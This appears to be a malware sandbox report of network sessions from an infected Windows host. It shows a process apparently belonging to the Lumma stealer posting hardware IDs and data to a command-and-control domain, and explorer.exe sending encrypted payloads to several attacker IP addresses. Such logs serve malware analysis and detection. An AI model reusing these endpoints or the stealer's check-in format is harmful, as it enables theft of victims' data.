2024-07-24 17:57:25 UTC	685	IN	Data Raw: 42 56 74 66 4c 6c 66 67 6d 32 62 4f 76 50 4a 6f 43 75 4c 55 2b 31 66 4d 4e 4b 41 6b 4d 4a 6d 35 48 31 56 66 74 68 69 49 53 36 78 52 30 34 64 68 61 75 4a 33 64 55 2b 4a 7a 75 4d 79 4a 4e 78 4a 4e 67 76 35 56 66 6b 6d 46 71 7a 5a 63 43 34 52 70 6d 30 67 52 77 78 70 6b 6d 50 6b 30 75 77 74 75 76 41 56 47 36 49 54 75 6d 67 70 78 49 31 39 39 34 6a 6d 70 72 51 61 42 42 57 69 76 77 62 2b 52 34 38 6d 53 4b 78 4d 52 39 31 4b 59 63 78 32 50 47 55 6b 56 33 44 6c 52 2f 46 6d 49 70 4d 4f 73 4d 38 6b 74 73 71 31 38 58 4d 35 46 62 2f 7a 75 54 43 50 4f 71 38 69 6a 50 51 6c 51 58 38 67 41 42 4e 75 34 71 37 6c 64 2f 68 2f 64 45 51 46 39 44 72 4c 59 4b 79 31 45 4e 36 2f 75 53 63 42 70 36 74 74 56 68 2f 71 67 65 43 69 55 52 41 33 56 48 6f 52 72 44 34 53 46 6a 74 33 76 6c 50 Data Ascii: BVtfLlfgm2bOvPJoCuLU+1fMNKAkMJm5H1VfthiIS6xR04dhauJ3dU+JzuMyJNxJNgv5VfkmFqzZcC4Rpm0gRwxpkmPk0uwtuvAVG6ITumgpxI1994jmprQaBBWivwb+R48mSKxMR91KYcx2PGUkV3DlR/FmIpMOsM8ktsq18XM5Fb/zuTCPOq8ijPQlQX8gABNu4q7ld/h/dEQF9DrLYKy1EN6/uScBp6ttVh/qgeCiURA3VHoRrD4SFjt3vlP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.10	49789	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:26 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-24 17:57:26 UTC	1267	OUT	Data Raw: 65 73 59 34 74 77 52 4a 6b 42 51 4c 32 65 35 38 6d 75 64 4a 38 36 5a 79 4f 6a 45 45 35 43 5a 49 2f 50 6f 2f 48 6b 6e 4b 47 62 50 47 7a 65 44 57 61 4d 66 36 6f 6f 6d 73 77 30 6d 30 34 59 66 53 57 4d 6f 7a 54 36 42 74 54 7a 54 47 49 6f 66 35 41 34 58 65 6f 70 6f 4b 49 6d 2b 37 6a 74 34 7a 70 68 51 46 76 33 31 32 6e 73 48 68 7a 2f 7a 32 48 41 47 69 50 64 52 6f 38 67 61 44 55 75 58 33 50 66 31 56 62 6f 51 6d 74 4d 49 2f 50 47 44 79 36 4f 77 33 56 78 72 73 6c 70 4a 47 63 69 62 67 37 75 4f 74 79 50 69 44 50 6b 7a 74 72 67 34 4d 57 71 31 49 71 50 44 51 48 46 55 61 41 47 65 66 4a 51 41 71 69 34 43 73 2b 76 6b 35 78 51 4a 72 7a 49 4a 72 71 6d 78 34 71 33 6f 30 34 55 48 4b 41 71 59 59 42 38 44 2f 62 62 30 42 6f 4a 74 34 6d 6e 6b 6d 2b 6f 79 76 49 46 75 78 51 33 2f Data Ascii: esY4twRJkBQL2e58mudJ86ZyOjEE5CZI/Po/HknKGbPGzeDWaMf6oomsw0m04YfSWMozT6BtTzTGIof5A4XeopoKIm+7jt4zphQFv312nsHhz/z2HAGiPdRo8gaDUuX3Pf1VboQmtMI/PGDy6Ow3VxrslpJGcibg7uOtyPiDPkztrg4MWq1IqPDQHFUaAGefJQAqi4Cs+vk5xQJrzIJrqmx4q3o04UHKAqYYB8D/bb0BoJt4mnkm+oyvIFuxQ3/
2024-07-24 17:57:27 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:27 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:27 UTC	685	IN	Data Raw: 66 33 44 2b 53 63 2f 41 6f 34 41 77 4c 38 59 57 47 58 6c 33 4d 79 77 6c 69 4f 2b 42 48 30 57 2f 2b 6e 69 76 73 7a 74 5a 4a 2f 6f 55 33 6c 61 4d 44 53 41 61 49 6a 39 6f 47 30 42 54 79 67 63 52 4c 70 72 78 67 50 77 77 38 43 71 65 57 50 4d 46 38 61 66 6d 49 63 50 47 65 79 4d 74 48 53 50 47 76 46 2b 55 64 36 42 73 54 55 4a 4c 2b 6a 53 73 6e 33 46 49 34 71 76 33 34 46 44 61 31 77 46 56 66 44 38 32 53 45 33 65 34 43 76 66 4c 6c 6b 30 48 39 65 62 56 49 51 75 4d 75 4a 61 58 4e 64 59 59 45 41 5a 4d 6d 43 6f 68 36 52 31 65 6d 58 4b 64 35 59 34 4c 75 74 45 42 4d 50 54 73 56 30 32 43 4d 4f 77 68 33 6f 71 78 35 79 50 35 48 6c 4b 45 46 6b 5a 64 2b 4d 7a 54 6b 7a 30 41 32 46 66 31 5a 49 38 51 4c 78 65 30 76 67 4f 4f 46 36 78 66 41 71 42 61 39 6e 69 43 56 56 36 6d 64 33 Data Ascii: f3D+Sc/Ao4AwL8YWGXl3MywliO+BH0W/+nivsztZJ/oU3laMDSAaIj9oG0BTygcRLprxgPww8CqeWPMF8afmIcPGeyMtHSPGvF+Ud6BsTUJL+jSsn3FI4qv34FDa1wFVfD82SE3e4CvfLlk0H9ebVIQuMuJaXNdYYEAZMmCoh6R1emXKd5Y4LutEBMPTsV02CMOwh3oqx5yP5HlKEFkZd+MzTkz0A2Ff1ZI8QLxe0vgOOF6xfAqBa9niCVV6md3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.10	49790	172.67.213.85	443	7864	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:26 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20431 Host: liernessfornicsa.shop
2024-07-24 17:57:26 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 54 6f 59 72 4a 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8F2C114769E59A360D3FAAA1B508DF78--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"qToYrJ----b
2024-07-24 17:57:26 UTC	5100	OUT	Data Raw: 00 60 83 eb 8b 82 f9 0d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e0 fa a2 60 7e c3 4f 03 00 00 00 00 00 00 00 Data Ascii: `?lpQ0/74G6(~`~O
2024-07-24 17:57:27 UTC	808	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 17:57:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=iakh73pguuf4qchi8060gcdj74; expires=Sun, 17-Nov-2024 11:44:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cAcjTYbDQavkkcBb5R8Y%2F5y3khvXWZXrIPwnS5%2Fl6Do%2BEyj0efGZlKCI2GKkz7AcUY7hOc0kZigaX3KVCP1VSDis3j9vQnv4QzsIuL8VQDw0XO4n6DLSMjIE2AulXpMuvfkA%2FLEmUmE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a85cae94fe30c9c-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 17:57:27 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-24 17:57:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.10	49791	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:28 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:28 UTC	1122	OUT	Data Raw: 5a 47 63 32 43 2f 77 32 51 33 35 4a 74 34 32 44 58 32 79 36 51 70 6c 51 76 2b 54 5a 61 46 77 6b 59 4b 68 6b 31 75 76 44 33 36 57 39 76 56 4f 72 6a 6c 49 58 30 68 59 33 79 62 44 42 52 34 68 6b 58 6d 56 54 50 61 57 30 54 39 47 4c 33 7a 6c 68 35 6b 61 33 57 79 6a 6e 6e 73 73 6c 74 37 44 71 4e 4a 37 56 5a 54 52 73 44 79 7a 4b 53 79 6e 68 6a 58 36 66 79 71 72 46 62 62 71 46 7a 54 34 46 35 64 4c 43 2b 50 6d 70 38 54 37 32 77 61 38 46 38 77 68 63 54 65 69 48 2b 7a 34 4f 76 64 61 2f 43 58 4b 49 77 36 46 57 53 4f 70 35 51 75 71 37 55 31 45 45 47 48 4f 76 44 4c 4c 4a 75 56 75 64 51 69 41 72 33 4d 69 36 34 56 78 4b 55 2b 72 2f 58 44 68 58 38 4f 63 34 69 51 32 48 74 45 38 34 42 35 61 49 32 2b 6b 31 4f 35 65 76 38 46 57 4c 33 57 47 34 58 43 54 6a 67 61 41 34 41 72 59 Data Ascii: ZGc2C/w2Q35Jt42DX2y6QplQv+TZaFwkYKhk1uvD36W9vVOrjlIX0hY3ybDBR4hkXmVTPaW0T9GL3zlh5ka3Wyjnnsslt7DqNJ7VZTRsDyzKSynhjX6fyqrFbbqFzT4F5dLC+Pmp8T72wa8F8whcTeiH+z4Ovda/CXKIw6FWSOp5Quq7U1EEGHOvDLLJuVudQiAr3Mi64VxKU+r/XDhX8Oc4iQ2HtE84B5aI2+k1O5ev8FWL3WG4XCTjgaA4ArY
2024-07-24 17:57:29 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:29 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:29 UTC	685	IN	Data Raw: 64 51 61 52 75 72 65 63 67 5a 54 76 34 41 66 63 35 36 4b 79 4b 75 67 58 5a 75 43 68 58 61 5a 69 62 34 32 43 71 55 31 73 78 56 4a 6f 65 47 66 32 4d 75 38 6f 72 34 55 4b 52 4b 31 6a 4c 58 63 4d 4f 6e 56 56 6f 6c 73 33 33 44 6f 30 2b 49 45 69 71 6a 59 69 33 53 30 68 49 77 67 59 6a 58 51 78 37 67 58 79 74 61 6a 61 6d 57 4e 64 37 75 52 71 4b 31 4d 6e 67 4c 33 6b 6a 4f 76 56 61 32 62 44 51 37 57 48 62 6f 44 6e 59 43 47 6c 4f 70 49 5a 67 54 6e 31 6c 53 45 4f 58 58 33 69 62 61 51 79 61 67 4b 2b 64 54 6c 56 58 35 66 34 79 78 57 77 67 37 76 76 43 78 49 4c 51 64 79 77 6c 4c 61 57 73 78 68 68 6c 58 70 2f 38 39 54 67 78 63 78 77 39 77 75 78 35 48 2b 4e 78 48 4d 68 4a 6f 6b 53 36 5a 76 59 67 38 68 79 62 2b 39 37 76 44 59 53 61 53 4c 58 73 33 56 49 59 51 45 2b 37 44 77 Data Ascii: dQaRurecgZTv4Afc56KyKugXZuChXaZib42CqU1sxVJoeGf2Mu8or4UKRK1jLXcMOnVVols33Do0+IEiqjYi3S0hIwgYjXQx7gXytajamWNd7uRqK1MngL3kjOvVa2bDQ7WHboDnYCGlOpIZgTn1lSEOXX3ibaQyagK+dTlVX5f4yxWwg7vvCxILQdywlLaWsxhhlXp/89Tgxcxw9wux5H+NxHMhJokS6ZvYg8hyb+97vDYSaSLXs3VIYQE+7Dw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.10	49792	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:30 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:30 UTC	1122	OUT	Data Raw: 55 52 44 4d 41 30 78 71 75 33 64 4b 4e 6b 65 75 51 66 35 73 5a 37 30 53 37 37 74 31 58 68 77 2b 36 64 6b 63 5a 68 35 37 54 74 4e 6b 48 62 35 52 32 51 65 6e 76 6d 66 33 78 4d 65 35 75 63 66 55 6f 45 49 69 6d 48 57 42 59 43 33 6e 4b 4b 54 47 65 49 74 33 5a 71 77 74 2f 55 43 4b 47 4f 38 2f 2b 6d 41 50 45 61 4e 50 2f 61 6f 71 69 79 64 54 67 6d 55 51 30 30 6d 45 4c 7a 79 31 69 69 38 51 77 49 71 65 37 47 47 37 43 46 38 4c 4b 66 43 56 6d 37 63 2f 69 43 61 4f 71 63 47 6d 6b 61 6b 52 4c 63 52 33 49 35 6a 43 2b 66 71 45 37 2b 79 55 70 76 4f 45 62 43 44 6e 4b 56 34 4f 64 63 76 7a 6d 7a 31 41 47 43 31 41 66 53 61 49 4d 6d 6a 6d 62 56 4b 4b 74 4d 76 79 4a 49 35 61 79 46 6f 4f 43 47 43 78 33 6c 6d 48 56 55 67 2b 4c 4f 35 65 73 54 58 65 51 6c 37 34 45 79 50 68 4d 56 58 Data Ascii: URDMA0xqu3dKNkeuQf5sZ70S77t1Xhw+6dkcZh57TtNkHb5R2Qenvmf3xMe5ucfUoEIimHWBYC3nKKTGeIt3Zqwt/UCKGO8/+mAPEaNP/aoqiydTgmUQ00mELzy1ii8QwIqe7GG7CF8LKfCVm7c/iCaOqcGmkakRLcR3I5jC+fqE7+yUpvOEbCDnKV4Odcvzmz1AGC1AfSaIMmjmbVKKtMvyJI5ayFoOCGCx3lmHVUg+LO5esTXeQl74EyPhMVX
2024-07-24 17:57:31 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:31 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:31 UTC	685	IN	Data Raw: 46 37 77 71 47 32 61 4c 77 39 57 48 32 41 7a 2b 71 44 54 75 67 69 77 4e 47 4e 63 4e 4c 62 61 32 50 39 79 44 4b 6a 38 39 36 6b 4b 6b 55 5a 69 30 76 4e 76 42 56 41 49 4a 51 67 48 50 37 35 50 69 55 79 48 54 76 65 36 4c 59 6c 48 7a 6d 53 42 6c 6b 38 43 79 75 64 4e 71 54 4c 44 55 34 37 58 75 53 74 70 68 42 69 79 38 32 30 4f 6c 48 31 4f 59 64 5a 77 6f 5a 48 61 33 70 37 2f 69 36 6d 77 31 35 41 61 7a 63 47 4b 77 4e 32 6d 47 42 52 68 77 62 46 4a 68 59 6f 46 70 62 7a 54 30 39 43 4b 2b 67 62 6d 36 30 48 4c 54 66 2f 68 5a 62 4f 4a 69 4b 47 42 6e 63 7a 59 7a 57 4f 34 43 57 6e 6f 65 42 38 31 61 65 75 59 4c 35 65 4e 36 43 68 4b 6f 44 72 44 64 42 6f 37 54 4f 33 6c 61 69 79 67 50 76 71 4b 73 68 6f 6b 71 74 30 5a 32 75 6f 61 75 62 6b 66 46 47 31 6b 42 51 32 67 59 6a 32 68 Data Ascii: F7wqG2aLw9WH2Az+qDTugiwNGNcNLba2P9yDKj896kKkUZi0vNvBVAIJQgHP75PiUyHTve6LYlHzmSBlk8CyudNqTLDU47XuStphBiy820OlH1OYdZwoZHa3p7/i6mw15AazcGKwN2mGBRhwbFJhYoFpbzT09CK+gbm60HLTf/hZbOJiKGBnczYzWO4CWnoeB81aeuYL5eN6ChKoDrDdBo7TO3laiygPvqKshokqt0Z2uoaubkfFG1kBQ2gYj2h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.10	49793	172.67.213.85	443	7864	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:31 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1232 Host: liernessfornicsa.shop
2024-07-24 17:57:31 UTC	1232	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 54 6f 59 72 4a 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8F2C114769E59A360D3FAAA1B508DF78--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"qToYrJ----b
2024-07-24 17:57:32 UTC	810	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 17:57:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=abmrtq6mhsa5uasap115f3dmof; expires=Sun, 17-Nov-2024 11:44:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jCLAFsLjKLF%2BGvHBwUiRxXs8JD1%2FmW%2BmzUtsbZ0xkdJPm9hzYatSVZ7sFCqqZ0eMJhJ5jLapoDjfoP2RM9%2Ft4ZKbsQQpN3%2F8QELUUGVC7cNtqKmtBSJit2AIGvOzCekyjNCWOfrER9k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a85cb06fdfa4303-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 17:57:32 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-24 17:57:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.10	49794	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:32 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:32 UTC	1122	OUT	Data Raw: 4f 4a 71 43 76 45 79 41 56 77 4a 72 73 77 71 47 48 47 56 72 30 68 64 59 4e 2f 33 78 4a 5a 31 6a 5a 49 75 54 46 4c 78 34 34 45 62 77 66 7a 6f 6c 4e 61 38 2b 6e 63 4a 6f 52 76 6d 37 7a 57 35 75 46 34 54 69 59 33 79 46 32 4a 61 4c 78 30 56 4c 64 4d 34 6f 72 44 63 73 62 48 71 4d 2b 38 32 67 54 31 44 75 76 39 68 6a 43 30 7a 53 50 6c 61 4c 31 5a 65 58 74 6a 2f 6f 49 36 54 6a 55 64 71 78 72 30 39 73 33 42 66 50 53 73 30 76 54 48 79 64 79 55 4f 69 42 31 54 62 39 65 44 52 44 6f 69 6d 43 71 51 36 65 50 6b 42 56 33 72 41 6b 2b 78 30 77 71 58 61 4d 6a 56 71 30 42 66 61 49 45 36 67 52 62 6e 32 39 66 6e 44 56 4e 47 67 46 33 37 4b 51 2b 35 7a 66 67 69 72 77 43 51 4c 4f 37 61 6c 33 6c 6e 45 66 78 6f 54 6a 6f 65 4c 50 30 4b 30 6a 33 53 6e 4f 6e 64 4d 33 41 4c 63 75 50 33 Data Ascii: OJqCvEyAVwJrswqGHGVr0hdYN/3xJZ1jZIuTFLx44EbwfzolNa8+ncJoRvm7zW5uF4TiY3yF2JaLx0VLdM4orDcsbHqM+82gT1Duv9hjC0zSPlaL1ZeXtj/oI6TjUdqxr09s3BfPSs0vTHydyUOiB1Tb9eDRDoimCqQ6ePkBV3rAk+x0wqXaMjVq0BfaIE6gRbn29fnDVNGgF37KQ+5zfgirwCQLO7al3lnEfxoTjoeLP0K0j3SnOndM3ALcuP3
2024-07-24 17:57:33 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:33 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:33 UTC	685	IN	Data Raw: 66 6d 4b 41 48 72 66 33 48 5a 53 34 63 74 68 69 32 42 59 4e 5a 58 76 35 69 76 30 6d 73 46 55 69 7a 73 36 39 6b 4c 67 78 59 62 5a 71 37 6e 4d 42 44 56 5a 69 39 64 59 4a 49 77 4c 74 33 39 6b 6a 35 51 42 36 6e 30 45 48 4f 72 68 7a 7a 46 58 4c 4a 41 59 46 78 6f 5a 4f 42 4c 63 4c 74 39 63 73 34 73 33 34 4f 4b 42 31 4e 4b 48 4c 2b 79 41 66 50 54 37 55 67 2f 48 58 76 50 36 54 49 54 6f 36 34 67 48 35 46 55 45 73 65 4e 42 66 75 38 46 36 69 68 4b 65 68 4d 2f 34 34 7a 71 75 6e 76 6b 34 51 32 71 4c 65 50 74 54 45 6d 59 54 59 78 57 6d 56 32 4c 58 73 42 63 55 4d 31 43 31 67 2b 49 50 46 57 4a 55 35 66 42 41 67 70 33 69 54 5a 4f 66 72 42 4f 69 4b 71 33 4e 79 46 56 66 4e 42 2f 51 47 49 53 49 55 6f 41 75 4f 46 79 49 64 63 4c 6a 5a 38 36 62 35 44 37 2f 33 30 6f 55 4c 30 32 Data Ascii: fmKAHrf3HZS4cthi2BYNZXv5iv0msFUizs69kLgxYbZq7nMBDVZi9dYJIwLt39kj5QB6n0EHOrhzzFXLJAYFxoZOBLcLt9cs4s34OKB1NKHL+yAfPT7Ug/HXvP6TITo64gH5FUEseNBfu8F6ihKehM/44zqunvk4Q2qLePtTEmYTYxWmV2LXsBcUM1C1g+IPFWJU5fBAgp3iTZOfrBOiKq3NyFVfNB/QGISIUoAuOFyIdcLjZ86b5D7/30oUL02

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.10	49795	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:34 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:34 UTC	1122	OUT	Data Raw: 56 4a 4a 78 51 67 39 55 50 37 2b 6c 4f 31 6f 6b 6c 71 71 58 66 59 4b 58 58 59 32 68 39 4c 68 57 6e 47 59 5a 36 53 4e 37 67 41 53 67 77 76 52 46 79 78 78 4b 57 37 4e 4b 36 43 2b 2b 74 47 75 6f 4b 72 39 67 69 68 69 58 45 4e 58 55 68 56 74 48 74 37 64 33 77 6e 6b 45 62 52 67 43 4f 68 6b 76 70 70 77 39 5a 71 4e 4d 6f 56 32 4f 62 54 42 52 79 79 2b 67 78 41 69 46 48 34 7a 69 48 6b 69 38 6c 36 38 73 73 68 56 71 74 53 77 47 56 34 57 6b 32 78 6f 6f 49 61 53 6d 51 72 2b 2b 65 79 31 54 45 64 47 6f 6b 6a 63 7a 43 55 32 72 65 2f 5a 51 30 56 68 71 39 6c 78 56 4d 43 42 47 66 48 47 41 6a 64 6b 76 58 4c 4f 32 46 6c 6c 51 55 2f 38 65 47 51 64 79 31 4a 75 59 78 30 4a 6d 6e 5a 2f 58 76 42 79 77 38 61 35 72 35 2f 57 70 63 46 42 72 69 36 31 39 39 33 4f 72 35 63 48 6e 31 47 73 Data Ascii: VJJxQg9UP7+lO1oklqqXfYKXXY2h9LhWnGYZ6SN7gASgwvRFyxxKW7NK6C++tGuoKr9gihiXENXUhVtHt7d3wnkEbRgCOhkvppw9ZqNMoV2ObTBRyy+gxAiFH4ziHki8l68sshVqtSwGV4Wk2xooIaSmQr++ey1TEdGokjczCU2re/ZQ0Vhq9lxVMCBGfHGAjdkvXLO2FllQU/8eGQdy1JuYx0JmnZ/XvByw8a5r5/WpcFBri61993Or5cHn1Gs
2024-07-24 17:57:35 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:35 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:35 UTC	685	IN	Data Raw: 68 30 48 70 33 36 49 4a 2f 36 57 37 75 6a 69 45 35 32 51 72 52 52 4a 6c 6f 57 53 62 6e 46 4d 69 75 59 71 69 52 39 65 6b 35 55 45 30 67 58 36 63 66 6a 57 6e 62 72 45 43 48 79 6a 67 45 57 68 6b 35 63 7a 64 62 74 78 38 48 51 47 2b 4a 4d 6d 66 31 44 4a 6b 2b 4f 67 45 58 45 6e 57 6e 73 42 73 72 6d 45 43 42 6d 57 34 33 6a 47 54 7a 57 39 45 4b 78 4a 7a 6a 73 69 2b 75 54 71 45 77 51 55 42 43 4b 42 75 6c 36 30 39 51 33 75 72 2f 49 32 58 78 45 47 54 54 38 68 6c 70 33 32 43 38 51 66 68 62 74 32 2f 69 72 67 62 76 54 42 37 7a 69 47 34 36 6f 30 74 70 63 4b 37 2b 32 4a 70 44 42 41 77 35 54 77 42 53 6c 4f 56 71 4f 4d 68 53 4a 4a 41 74 37 36 47 74 46 2f 4d 75 54 56 78 31 69 44 77 6f 68 7a 78 34 58 44 49 59 31 41 6b 44 6b 44 76 72 2b 51 2b 2b 4e 2b 64 4e 4f 62 66 5a 47 34 Data Ascii: 